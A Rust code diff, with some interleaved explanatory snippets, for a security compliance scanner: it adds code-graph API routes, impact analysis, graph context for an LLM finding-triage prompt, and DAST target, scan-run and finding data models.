let filter = doc! { "repo_id": &repo_id };
let nodes: Vec<CodeNode> = match db.graph_nodes().find(filter).await {
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let mut communities: std::collections::HashMap<u32, Vec<String>> =
std::collections::HashMap::new();
for node in &nodes {
if let Some(cid) = node.community_id {
communities
.entry(cid)
.or_default()
.push(node.qualified_name.clone());
}
}
let mut result: Vec<CommunityInfo> = communities
.into_iter()
.map(|(id, members)| CommunityInfo {
community_id: id,
member_count: members.len() as u32,
members,
})
.collect();
result.sort_by_key(|c| c.community_id);
let total = result.len() as u64;
Ok(Json(ApiResponse {
data: result,
total: Some(total),
page: None,
}))
}
#[derive(Serialize)]
pub struct CommunityInfo {
pub community_id: u32,
pub member_count: u32,
pub members: Vec<String>,
}
/// GET /api/v1/graph/:repo_id/impact/:finding_id — Impact analysis
pub async fn get_impact(
Extension(agent): AgentExt,
Path((repo_id, finding_id)): Path<(String, String)>,
) -> Result<Json<ApiResponse<Option<ImpactAnalysis>>>, StatusCode> {
let db = &agent.db;
let filter = doc! { "repo_id": &repo_id, "finding_id": &finding_id };
let impact = db
.impact_analyses()
.find_one(filter)
.await
.map_err(|_| StatusCode::INTERNAL_SERVER_ERROR)?;
Ok(Json(ApiResponse {
data: impact,
total: None,
page: None,
}))
}
/// GET /api/v1/graph/:repo_id/search — BM25 symbol search
pub async fn search_symbols(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
Query(params): Query<SearchParams>,
) -> Result<Json<ApiResponse<Vec<CodeNode>>>, StatusCode> {
let db = &agent.db;
// Simple text search on qualified_name and name fields
let filter = doc! {
"repo_id": &repo_id,
"name": { "$regex": &params.q, "$options": "i" },
};
let nodes: Vec<CodeNode> = match db
.graph_nodes()
.find(filter)
.limit(params.limit as i64)
.await
{
Ok(cursor) => collect_cursor_async(cursor).await,
Err(_) => Vec::new(),
};
let total = nodes.len() as u64;
Ok(Json(ApiResponse {
data: nodes,
total: Some(total),
page: None,
}))
}
/// POST /api/v1/graph/:repo_id/build — Trigger graph rebuild
pub async fn trigger_build(
Extension(agent): AgentExt,
Path(repo_id): Path<String>,
) -> Result<Json<serde_json::Value>, StatusCode> {
let agent_clone = (*agent).clone();
tokio::spawn(async move {
let repo = match agent_clone
.db
.repositories()
.find_one(doc! { "_id": mongodb::bson::oid::ObjectId::parse_str(&repo_id).ok() })
.await
{
Ok(Some(r)) => r,
_ => {
tracing::error!("Repository {repo_id} not found for graph build");
return;
}
};
let git_ops = crate::pipeline::git::GitOps::new(&agent_clone.config.git_clone_base_path);
let repo_path = match git_ops.clone_or_fetch(&repo.git_url, &repo.name) {
Ok(p) => p,
Err(e) => {
tracing::error!("Failed to clone repo for graph build: {e}");
return;
}
};
let graph_build_id = uuid::Uuid::new_v4().to_string();
let engine = compliance_graph::GraphEngine::new(50_000);
match engine.build_graph(&repo_path, &repo_id, &graph_build_id) {
Ok((code_graph, build_run)) => {
let store =
compliance_graph::graph::persistence::GraphStore::new(agent_clone.db.inner());
let _ = store.delete_repo_graph(&repo_id).await;
let _ = store
.store_graph(&build_run, &code_graph.nodes, &code_graph.edges)
.await;
tracing::info!(
"[{repo_id}] Graph rebuild complete: {} nodes, {} edges",
build_run.node_count,
build_run.edge_count
);
}
Err(e) => {
tracing::error!("[{repo_id}] Graph rebuild failed: {e}");
}
}
});
Ok(Json(
serde_json::json!({ "status": "graph_build_triggered" }),
))
}

View File

@@ -1,3 +1,6 @@
pub mod dast;
pub mod graph;
use std::sync::Arc;
#[allow(unused_imports)]
@@ -410,8 +413,11 @@ async fn collect_cursor_async<T: serde::de::DeserializeOwned + Unpin + Send>(
) -> Vec<T> {
use futures_util::StreamExt;
let mut items = Vec::new();
while let Some(result) = cursor.next().await {
match result {
Ok(item) => items.push(item),
Err(e) => tracing::warn!("Failed to deserialize document: {e}"),
}
}
items
}
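The revised `collect_cursor_async` keeps every deserializable document and logs the rest, instead of silently stopping at the first bad document. The same keep-and-count pattern, sketched over a plain iterator of `Result`s (no MongoDB types, illustration only):

```rust
/// Collect Ok values from a fallible sequence, counting failures instead of
/// aborting on the first error (mirrors collect_cursor_async's behavior).
fn collect_ok<T, E>(results: impl IntoIterator<Item = Result<T, E>>) -> (Vec<T>, usize) {
    let mut items = Vec::new();
    let mut failed = 0;
    for result in results {
        match result {
            Ok(item) => items.push(item),
            Err(_) => failed += 1, // would be tracing::warn! in the real code
        }
    }
    (items, failed)
}

fn main() {
    let input: Vec<Result<i32, &str>> = vec![Ok(1), Err("bad doc"), Ok(3)];
    let (items, failed) = collect_ok(input);
    assert_eq!(items, vec![1, 3]); // good documents survive
    assert_eq!(failed, 1);         // bad ones are counted, not fatal
}
```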

View File

@@ -22,4 +22,54 @@ pub fn build_router() -> Router {
.route("/api/v1/sbom", get(handlers::list_sbom))
.route("/api/v1/issues", get(handlers::list_issues))
.route("/api/v1/scan-runs", get(handlers::list_scan_runs))
// Graph API endpoints
.route(
"/api/v1/graph/{repo_id}",
get(handlers::graph::get_graph),
)
.route(
"/api/v1/graph/{repo_id}/nodes",
get(handlers::graph::get_nodes),
)
.route(
"/api/v1/graph/{repo_id}/communities",
get(handlers::graph::get_communities),
)
.route(
"/api/v1/graph/{repo_id}/impact/{finding_id}",
get(handlers::graph::get_impact),
)
.route(
"/api/v1/graph/{repo_id}/search",
get(handlers::graph::search_symbols),
)
.route(
"/api/v1/graph/{repo_id}/build",
post(handlers::graph::trigger_build),
)
// DAST API endpoints
.route(
"/api/v1/dast/targets",
get(handlers::dast::list_targets),
)
.route(
"/api/v1/dast/targets",
post(handlers::dast::add_target),
)
.route(
"/api/v1/dast/targets/{id}/scan",
post(handlers::dast::trigger_scan),
)
.route(
"/api/v1/dast/scan-runs",
get(handlers::dast::list_scan_runs),
)
.route(
"/api/v1/dast/findings",
get(handlers::dast::list_findings),
)
.route(
"/api/v1/dast/findings/{id}",
get(handlers::dast::get_finding),
)
}
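The route templates use `{param}` placeholders, which is axum 0.8 syntax (0.7 and earlier used `:param`). A small client-side helper (hypothetical, not in this codebase) for turning those templates into concrete URLs:

```rust
/// Fill `{name}` placeholders in a route template with concrete values.
/// Illustrative client-side helper; server-side matching is handled by axum's router.
fn fill_path(template: &str, params: &[(&str, &str)]) -> String {
    let mut path = template.to_string();
    for (key, value) in params {
        path = path.replace(&format!("{{{key}}}"), value);
    }
    path
}

fn main() {
    let url = fill_path(
        "/api/v1/graph/{repo_id}/impact/{finding_id}",
        &[("repo_id", "abc123"), ("finding_id", "f-9")],
    );
    assert_eq!(url, "/api/v1/graph/abc123/impact/f-9");
}
```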

View File

@@ -88,6 +88,70 @@ impl Database {
)
.await?;
// graph_nodes: compound (repo_id, graph_build_id)
self.graph_nodes()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_edges: compound (repo_id, graph_build_id)
self.graph_edges()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "graph_build_id": 1 })
.build(),
)
.await?;
// graph_builds: compound (repo_id, started_at DESC)
self.graph_builds()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "started_at": -1 })
.build(),
)
.await?;
// impact_analyses: unique (repo_id, finding_id)
self.impact_analyses()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1, "finding_id": 1 })
.options(IndexOptions::builder().unique(true).build())
.build(),
)
.await?;
// dast_targets: index on repo_id
self.dast_targets()
.create_index(
IndexModel::builder()
.keys(doc! { "repo_id": 1 })
.build(),
)
.await?;
// dast_scan_runs: compound (target_id, started_at DESC)
self.dast_scan_runs()
.create_index(
IndexModel::builder()
.keys(doc! { "target_id": 1, "started_at": -1 })
.build(),
)
.await?;
// dast_findings: compound (scan_run_id, vuln_type)
self.dast_findings()
.create_index(
IndexModel::builder()
.keys(doc! { "scan_run_id": 1, "vuln_type": 1 })
.build(),
)
.await?;
tracing::info!("Database indexes ensured");
Ok(())
}
@@ -116,8 +180,43 @@ impl Database {
self.inner.collection("tracker_issues")
}
// Graph collections
pub fn graph_nodes(&self) -> Collection<compliance_core::models::graph::CodeNode> {
self.inner.collection("graph_nodes")
}
pub fn graph_edges(&self) -> Collection<compliance_core::models::graph::CodeEdge> {
self.inner.collection("graph_edges")
}
pub fn graph_builds(&self) -> Collection<compliance_core::models::graph::GraphBuildRun> {
self.inner.collection("graph_builds")
}
pub fn impact_analyses(&self) -> Collection<compliance_core::models::graph::ImpactAnalysis> {
self.inner.collection("impact_analyses")
}
// DAST collections
pub fn dast_targets(&self) -> Collection<DastTarget> {
self.inner.collection("dast_targets")
}
pub fn dast_scan_runs(&self) -> Collection<DastScanRun> {
self.inner.collection("dast_scan_runs")
}
pub fn dast_findings(&self) -> Collection<DastFinding> {
self.inner.collection("dast_findings")
}
#[allow(dead_code)]
pub fn raw_collection(&self, name: &str) -> Collection<mongodb::bson::Document> {
self.inner.collection(name)
}
/// Get the raw MongoDB database handle (for graph persistence)
pub fn inner(&self) -> &mongodb::Database {
&self.inner
}
}

View File

@@ -3,6 +3,7 @@ use std::sync::Arc;
use compliance_core::models::{Finding, FindingStatus};
use crate::llm::LlmClient;
use crate::pipeline::orchestrator::GraphContext;
const TRIAGE_SYSTEM_PROMPT: &str = r#"You are a security finding triage expert. Analyze the following security finding and determine:
1. Is this a true positive? (yes/no)
@@ -12,11 +13,15 @@ const TRIAGE_SYSTEM_PROMPT: &str = r#"You are a security finding triage expert.
Respond in JSON format:
{"true_positive": true/false, "confidence": N, "remediation": "..."}"#;
pub async fn triage_findings(
llm: &Arc<LlmClient>,
findings: &mut Vec<Finding>,
graph_context: Option<&GraphContext>,
) -> usize {
let mut passed = 0;
for finding in findings.iter_mut() {
let mut user_prompt = format!(
"Scanner: {}\nRule: {}\nSeverity: {}\nTitle: {}\nDescription: {}\nFile: {}\nLine: {}\nCode: {}",
finding.scanner,
finding.rule_id.as_deref().unwrap_or("N/A"),
@@ -28,6 +33,37 @@ pub async fn triage_findings(llm: &Arc<LlmClient>, findings: &mut Vec<Finding>)
finding.code_snippet.as_deref().unwrap_or("N/A"),
);
// Enrich with graph context if available
if let Some(ctx) = graph_context {
if let Some(impact) = ctx
.impacts
.iter()
.find(|i| i.finding_id == finding.fingerprint)
{
user_prompt.push_str(&format!(
"\n\n--- Code Graph Context ---\n\
Blast radius: {} nodes affected\n\
Entry points affected: {}\n\
Direct callers: {}\n\
Communities affected: {}\n\
Call chains: {}",
impact.blast_radius,
if impact.affected_entry_points.is_empty() {
"none".to_string()
} else {
impact.affected_entry_points.join(", ")
},
if impact.direct_callers.is_empty() {
"none".to_string()
} else {
impact.direct_callers.join(", ")
},
impact.affected_communities.len(),
impact.call_chains.len(),
));
}
}
match llm
.chat(TRIAGE_SYSTEM_PROMPT, &user_prompt, Some(0.1))
.await

View File

@@ -15,6 +15,16 @@ use crate::pipeline::patterns::{GdprPatternScanner, OAuthPatternScanner};
use crate::pipeline::sbom::SbomScanner;
use crate::pipeline::semgrep::SemgrepScanner;
/// Context from graph analysis passed to LLM triage for enhanced filtering
#[derive(Debug)]
#[allow(dead_code)]
pub struct GraphContext {
pub node_count: u32,
pub edge_count: u32,
pub community_count: u32,
pub impacts: Vec<compliance_core::models::graph::ImpactAnalysis>,
}
pub struct PipelineOrchestrator {
config: AgentConfig,
db: Database,
@@ -172,13 +182,30 @@ impl PipelineOrchestrator {
Err(e) => tracing::warn!("[{repo_id}] OAuth pattern scan failed: {e}"),
}
// Stage 4.5: Graph Building
tracing::info!("[{repo_id}] Stage 4.5: Graph Building");
self.update_phase(scan_run_id, "graph_building").await;
let graph_context = match self.build_code_graph(&repo_path, &repo_id, &all_findings).await
{
Ok(ctx) => Some(ctx),
Err(e) => {
tracing::warn!("[{repo_id}] Graph building failed: {e}");
None
}
};
// Stage 5: LLM Triage (enhanced with graph context)
tracing::info!(
"[{repo_id}] Stage 5: LLM Triage ({} findings)",
all_findings.len()
);
self.update_phase(scan_run_id, "llm_triage").await;
let triaged = crate::llm::triage::triage_findings(
&self.llm,
&mut all_findings,
graph_context.as_ref(),
)
.await;
tracing::info!("[{repo_id}] Triaged: {triaged} findings passed confidence threshold");
// Dedup against existing findings and insert new ones
@@ -250,10 +277,121 @@ impl PipelineOrchestrator {
)
.await?;
// Stage 8: DAST (async, optional — only if a DastTarget is configured)
tracing::info!("[{repo_id}] Stage 8: Checking for DAST targets");
self.update_phase(scan_run_id, "dast_scanning").await;
self.maybe_trigger_dast(&repo_id, scan_run_id).await;
tracing::info!("[{repo_id}] Scan complete: {new_count} new findings");
Ok(new_count)
}
/// Build the code knowledge graph for a repo and compute impact analyses
async fn build_code_graph(
&self,
repo_path: &std::path::Path,
repo_id: &str,
findings: &[Finding],
) -> Result<GraphContext, AgentError> {
let graph_build_id = uuid::Uuid::new_v4().to_string();
let engine = compliance_graph::GraphEngine::new(50_000);
let (mut code_graph, build_run) = engine
.build_graph(repo_path, repo_id, &graph_build_id)
.map_err(|e| AgentError::Other(format!("Graph build error: {e}")))?;
// Apply community detection
compliance_graph::graph::community::apply_communities(&mut code_graph);
// Store graph in MongoDB
let store = compliance_graph::graph::persistence::GraphStore::new(self.db.inner());
store
.delete_repo_graph(repo_id)
.await
.map_err(|e| AgentError::Other(format!("Graph cleanup error: {e}")))?;
store
.store_graph(&build_run, &code_graph.nodes, &code_graph.edges)
.await
.map_err(|e| AgentError::Other(format!("Graph store error: {e}")))?;
// Compute impact analysis for each finding
let analyzer = compliance_graph::GraphEngine::impact_analyzer(&code_graph);
let mut impacts = Vec::new();
for finding in findings {
if let Some(file_path) = &finding.file_path {
let impact = analyzer.analyze(
repo_id,
&finding.fingerprint,
&graph_build_id,
file_path,
finding.line_number,
);
store
.store_impact(&impact)
.await
.map_err(|e| AgentError::Other(format!("Impact store error: {e}")))?;
impacts.push(impact);
}
}
Ok(GraphContext {
node_count: build_run.node_count,
edge_count: build_run.edge_count,
community_count: build_run.community_count,
impacts,
})
}
/// Trigger DAST scan if a target is configured for this repo
async fn maybe_trigger_dast(&self, repo_id: &str, scan_run_id: &str) {
use futures_util::TryStreamExt;
let filter = mongodb::bson::doc! { "repo_id": repo_id };
let targets: Vec<compliance_core::models::DastTarget> = match self
.db
.dast_targets()
.find(filter)
.await
{
Ok(cursor) => cursor.try_collect().await.unwrap_or_default(),
Err(_) => return,
};
if targets.is_empty() {
tracing::info!("[{repo_id}] No DAST targets configured, skipping");
return;
}
for target in targets {
let db = self.db.clone();
let scan_run_id = scan_run_id.to_string();
tokio::spawn(async move {
let orchestrator = compliance_dast::DastOrchestrator::new(100);
match orchestrator.run_scan(&target, Vec::new()).await {
Ok((mut scan_run, findings)) => {
scan_run.sast_scan_run_id = Some(scan_run_id);
if let Err(e) = db.dast_scan_runs().insert_one(&scan_run).await {
tracing::error!("Failed to store DAST scan run: {e}");
}
for finding in &findings {
if let Err(e) = db.dast_findings().insert_one(finding).await {
tracing::error!("Failed to store DAST finding: {e}");
}
}
tracing::info!(
"DAST scan complete: {} findings",
findings.len()
);
}
Err(e) => {
tracing::error!("DAST scan failed: {e}");
}
}
});
}
}
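The DAST kick-off above is fire-and-forget: each target gets its own detached task that owns clones of the handles it needs. The same ownership pattern, sketched with stdlib threads instead of tokio tasks (illustration only):

```rust
use std::sync::Arc;
use std::sync::atomic::{AtomicU32, Ordering};
use std::thread;

/// Spawn one detached worker per target, each owning its own clones of shared state
/// (stands in for the per-target tokio::spawn in maybe_trigger_dast).
fn spawn_per_target(targets: Vec<String>, counter: Arc<AtomicU32>) -> Vec<thread::JoinHandle<()>> {
    targets
        .into_iter()
        .map(|target| {
            let counter = Arc::clone(&counter); // each worker owns its own handle
            thread::spawn(move || {
                // stands in for orchestrator.run_scan(&target, ...)
                let _ = target;
                counter.fetch_add(1, Ordering::SeqCst);
            })
        })
        .collect()
}

fn main() {
    let counter = Arc::new(AtomicU32::new(0));
    let handles = spawn_per_target(vec!["api".into(), "webapp".into()], Arc::clone(&counter));
    for h in handles {
        h.join().unwrap();
    }
    assert_eq!(counter.load(Ordering::SeqCst), 2); // one scan per target ran
}
```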
async fn update_phase(&self, scan_run_id: &str, phase: &str) {
if let Ok(oid) = mongodb::bson::oid::ObjectId::parse_str(scan_run_id) {
let _ = self

View File

@@ -19,5 +19,5 @@ sha2 = { workspace = true }
hex = { workspace = true }
uuid = { workspace = true }
secrecy = { workspace = true }
bson = { version = "2", features = ["chrono-0_4"] }
mongodb = { workspace = true, optional = true }

View File

@@ -38,6 +38,12 @@ pub enum CoreError {
#[error("IO error: {0}")]
Io(#[from] std::io::Error),
#[error("Graph error: {0}")]
Graph(String),
#[error("DAST error: {0}")]
Dast(String),
#[error("Not found: {0}")]
NotFound(String),

View File

@@ -0,0 +1,276 @@
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
use super::finding::Severity;
/// Type of DAST target application
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastTargetType {
WebApp,
RestApi,
GraphQl,
}
impl std::fmt::Display for DastTargetType {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::WebApp => write!(f, "webapp"),
Self::RestApi => write!(f, "rest_api"),
Self::GraphQl => write!(f, "graphql"),
}
}
}
/// Authentication configuration for DAST target
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastAuthConfig {
/// Authentication method: "none", "basic", "bearer", "cookie", "form"
pub method: String,
/// Login URL for form-based auth
pub login_url: Option<String>,
/// Username or token
pub username: Option<String>,
/// Password (stored encrypted in practice)
pub password: Option<String>,
/// Bearer token
pub token: Option<String>,
/// Custom headers for auth
pub headers: Option<std::collections::HashMap<String, String>>,
}
/// A target for DAST scanning
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastTarget {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub name: String,
pub base_url: String,
pub target_type: DastTargetType,
pub auth_config: Option<DastAuthConfig>,
/// Linked repository ID (for SAST correlation)
pub repo_id: Option<String>,
/// URL paths to exclude from scanning
pub excluded_paths: Vec<String>,
/// Maximum crawl depth
pub max_crawl_depth: u32,
/// Rate limit (requests per second)
pub rate_limit: u32,
/// Whether destructive tests (DELETE, PUT) are allowed
pub allow_destructive: bool,
pub created_at: DateTime<Utc>,
pub updated_at: DateTime<Utc>,
}
impl DastTarget {
pub fn new(name: String, base_url: String, target_type: DastTargetType) -> Self {
let now = Utc::now();
Self {
id: None,
name,
base_url,
target_type,
auth_config: None,
repo_id: None,
excluded_paths: Vec::new(),
max_crawl_depth: 5,
rate_limit: 10,
allow_destructive: false,
created_at: now,
updated_at: now,
}
}
}
/// Phase of a DAST scan
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastScanPhase {
Reconnaissance,
Crawling,
VulnerabilityAnalysis,
Exploitation,
Reporting,
Completed,
}
impl std::fmt::Display for DastScanPhase {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Reconnaissance => write!(f, "reconnaissance"),
Self::Crawling => write!(f, "crawling"),
Self::VulnerabilityAnalysis => write!(f, "vulnerability_analysis"),
Self::Exploitation => write!(f, "exploitation"),
Self::Reporting => write!(f, "reporting"),
Self::Completed => write!(f, "completed"),
}
}
}
/// Status of a DAST scan run
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastScanStatus {
Running,
Completed,
Failed,
Cancelled,
}
/// A DAST scan run
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastScanRun {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub target_id: String,
pub status: DastScanStatus,
pub current_phase: DastScanPhase,
pub phases_completed: Vec<DastScanPhase>,
/// Number of endpoints discovered during crawling
pub endpoints_discovered: u32,
/// Number of findings
pub findings_count: u32,
/// Number of confirmed exploitable findings
pub exploitable_count: u32,
pub error_message: Option<String>,
/// Linked SAST scan run ID (if triggered as part of pipeline)
pub sast_scan_run_id: Option<String>,
pub started_at: DateTime<Utc>,
pub completed_at: Option<DateTime<Utc>>,
}
impl DastScanRun {
pub fn new(target_id: String) -> Self {
Self {
id: None,
target_id,
status: DastScanStatus::Running,
current_phase: DastScanPhase::Reconnaissance,
phases_completed: Vec::new(),
endpoints_discovered: 0,
findings_count: 0,
exploitable_count: 0,
error_message: None,
sast_scan_run_id: None,
started_at: Utc::now(),
completed_at: None,
}
}
}
/// Type of DAST vulnerability
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum DastVulnType {
SqlInjection,
Xss,
AuthBypass,
Ssrf,
ApiMisconfiguration,
OpenRedirect,
Idor,
InformationDisclosure,
SecurityMisconfiguration,
BrokenAuth,
Other,
}
impl std::fmt::Display for DastVulnType {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::SqlInjection => write!(f, "sql_injection"),
Self::Xss => write!(f, "xss"),
Self::AuthBypass => write!(f, "auth_bypass"),
Self::Ssrf => write!(f, "ssrf"),
Self::ApiMisconfiguration => write!(f, "api_misconfiguration"),
Self::OpenRedirect => write!(f, "open_redirect"),
Self::Idor => write!(f, "idor"),
Self::InformationDisclosure => write!(f, "information_disclosure"),
Self::SecurityMisconfiguration => write!(f, "security_misconfiguration"),
Self::BrokenAuth => write!(f, "broken_auth"),
Self::Other => write!(f, "other"),
}
}
}
/// Evidence collected during DAST testing
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastEvidence {
/// HTTP request that triggered the finding
pub request_method: String,
pub request_url: String,
pub request_headers: Option<std::collections::HashMap<String, String>>,
pub request_body: Option<String>,
/// HTTP response
pub response_status: u16,
pub response_headers: Option<std::collections::HashMap<String, String>>,
/// Relevant snippet of response body
pub response_snippet: Option<String>,
/// Path to screenshot file (if captured)
pub screenshot_path: Option<String>,
/// The payload that triggered the vulnerability
pub payload: Option<String>,
/// Timing information (for timing-based attacks)
pub response_time_ms: Option<u64>,
}
/// A finding from DAST scanning
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct DastFinding {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub scan_run_id: String,
pub target_id: String,
pub vuln_type: DastVulnType,
pub title: String,
pub description: String,
pub severity: Severity,
pub cwe: Option<String>,
/// The URL endpoint where the vulnerability was found
pub endpoint: String,
/// HTTP method
pub method: String,
/// Parameter that is vulnerable
pub parameter: Option<String>,
/// Whether exploitability was confirmed with a working payload
pub exploitable: bool,
/// Evidence chain
pub evidence: Vec<DastEvidence>,
/// Remediation guidance
pub remediation: Option<String>,
/// Linked SAST finding ID (if correlated)
pub linked_sast_finding_id: Option<String>,
pub created_at: DateTime<Utc>,
}
impl DastFinding {
pub fn new(
scan_run_id: String,
target_id: String,
vuln_type: DastVulnType,
title: String,
description: String,
severity: Severity,
endpoint: String,
method: String,
) -> Self {
Self {
id: None,
scan_run_id,
target_id,
vuln_type,
title,
description,
severity,
cwe: None,
endpoint,
method,
parameter: None,
exploitable: false,
evidence: Vec::new(),
remediation: None,
linked_sast_finding_id: None,
created_at: Utc::now(),
}
}
}
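`DastFinding` carries its identity in `vuln_type`, `method`, `endpoint`, and `parameter`; a stable dedup key over those fields (hypothetical — the struct itself has no fingerprint field) could be derived like this:

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

/// Derive a dedup key for a DAST finding from its identity fields.
/// Sketch only: DefaultHasher is not guaranteed stable across Rust releases,
/// so a production fingerprint would use a fixed hash such as SHA-256.
fn dast_fingerprint(vuln_type: &str, method: &str, endpoint: &str, parameter: Option<&str>) -> u64 {
    let mut hasher = DefaultHasher::new();
    vuln_type.hash(&mut hasher);
    method.hash(&mut hasher);
    endpoint.hash(&mut hasher);
    parameter.hash(&mut hasher);
    hasher.finish()
}

fn main() {
    let a = dast_fingerprint("sql_injection", "GET", "/search", Some("q"));
    let b = dast_fingerprint("sql_injection", "GET", "/search", Some("q"));
    let c = dast_fingerprint("xss", "GET", "/search", Some("q"));
    assert_eq!(a, b); // same identity fields, same key
    assert_ne!(a, c); // different vuln type, different key
}
```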

View File

@@ -0,0 +1,186 @@
use chrono::{DateTime, Utc};
use serde::{Deserialize, Serialize};
/// Type of code node in the knowledge graph
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Hash)]
#[serde(rename_all = "snake_case")]
pub enum CodeNodeKind {
Function,
Method,
Class,
Struct,
Enum,
Interface,
Trait,
Module,
File,
}
impl std::fmt::Display for CodeNodeKind {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Function => write!(f, "function"),
Self::Method => write!(f, "method"),
Self::Class => write!(f, "class"),
Self::Struct => write!(f, "struct"),
Self::Enum => write!(f, "enum"),
Self::Interface => write!(f, "interface"),
Self::Trait => write!(f, "trait"),
Self::Module => write!(f, "module"),
Self::File => write!(f, "file"),
}
}
}
/// A node in the code knowledge graph
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CodeNode {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub graph_build_id: String,
/// Unique identifier within the graph (e.g., "src/main.rs::main")
pub qualified_name: String,
pub name: String,
pub kind: CodeNodeKind,
pub file_path: String,
pub start_line: u32,
pub end_line: u32,
/// Language of the source file
pub language: String,
/// Community ID from Louvain clustering
pub community_id: Option<u32>,
/// Whether this is a public entry point (main, exported fn, HTTP handler, etc.)
pub is_entry_point: bool,
/// Internal petgraph node index for fast lookups
#[serde(skip_serializing_if = "Option::is_none")]
pub graph_index: Option<u32>,
}
/// Type of relationship between code nodes
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq, Hash)]
#[serde(rename_all = "snake_case")]
pub enum CodeEdgeKind {
Calls,
Imports,
Inherits,
Implements,
Contains,
/// A type reference (e.g., function parameter type, return type)
TypeRef,
}
impl std::fmt::Display for CodeEdgeKind {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
Self::Calls => write!(f, "calls"),
Self::Imports => write!(f, "imports"),
Self::Inherits => write!(f, "inherits"),
Self::Implements => write!(f, "implements"),
Self::Contains => write!(f, "contains"),
Self::TypeRef => write!(f, "type_ref"),
}
}
}
/// An edge in the code knowledge graph
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct CodeEdge {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub graph_build_id: String,
/// Qualified name of source node
pub source: String,
/// Qualified name of target node
pub target: String,
pub kind: CodeEdgeKind,
/// File where this relationship was found
pub file_path: String,
pub line_number: Option<u32>,
}
/// Status of a graph build operation
#[derive(Debug, Clone, Serialize, Deserialize, PartialEq, Eq)]
#[serde(rename_all = "snake_case")]
pub enum GraphBuildStatus {
Running,
Completed,
Failed,
}
/// Tracks a graph build operation for a repo/commit
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct GraphBuildRun {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub commit_sha: Option<String>,
pub status: GraphBuildStatus,
pub node_count: u32,
pub edge_count: u32,
pub community_count: u32,
pub languages_parsed: Vec<String>,
pub error_message: Option<String>,
pub started_at: DateTime<Utc>,
pub completed_at: Option<DateTime<Utc>>,
}
impl GraphBuildRun {
pub fn new(repo_id: String) -> Self {
Self {
id: None,
repo_id,
commit_sha: None,
status: GraphBuildStatus::Running,
node_count: 0,
edge_count: 0,
community_count: 0,
languages_parsed: Vec::new(),
error_message: None,
started_at: Utc::now(),
completed_at: None,
}
}
}
/// Impact analysis result for a finding
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct ImpactAnalysis {
#[serde(rename = "_id", skip_serializing_if = "Option::is_none")]
pub id: Option<bson::oid::ObjectId>,
pub repo_id: String,
pub finding_id: String,
pub graph_build_id: String,
/// Number of nodes reachable from the finding location
pub blast_radius: u32,
/// Entry points affected by this finding (via reverse call chain)
pub affected_entry_points: Vec<String>,
/// Call chains from entry points to the finding location
pub call_chains: Vec<Vec<String>>,
/// Community IDs affected
pub affected_communities: Vec<u32>,
/// Direct callers of the affected function
pub direct_callers: Vec<String>,
/// Direct callees of the affected function
pub direct_callees: Vec<String>,
pub created_at: DateTime<Utc>,
}
impl ImpactAnalysis {
pub fn new(repo_id: String, finding_id: String, graph_build_id: String) -> Self {
Self {
id: None,
repo_id,
finding_id,
graph_build_id,
blast_radius: 0,
affected_entry_points: Vec::new(),
call_chains: Vec::new(),
affected_communities: Vec::new(),
direct_callers: Vec::new(),
direct_callees: Vec::new(),
created_at: Utc::now(),
}
}
}
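The `blast_radius` field counts nodes reachable from the finding location. Over a plain adjacency list (a stand-in for the petgraph-backed graph the engine actually uses), the computation is a breadth-first traversal:

```rust
use std::collections::{HashMap, HashSet, VecDeque};

/// Count nodes reachable from `start` by following call edges, excluding
/// `start` itself — the "blast radius" of a finding at that node.
/// Sketch over a plain adjacency list; the real engine uses petgraph.
fn blast_radius(edges: &HashMap<&str, Vec<&str>>, start: &str) -> u32 {
    let mut seen: HashSet<&str> = HashSet::new();
    let mut queue = VecDeque::from([start]);
    while let Some(node) = queue.pop_front() {
        for &next in edges.get(node).into_iter().flatten() {
            if seen.insert(next) {
                queue.push_back(next);
            }
        }
    }
    seen.remove(start); // a cycle back to start should not count it
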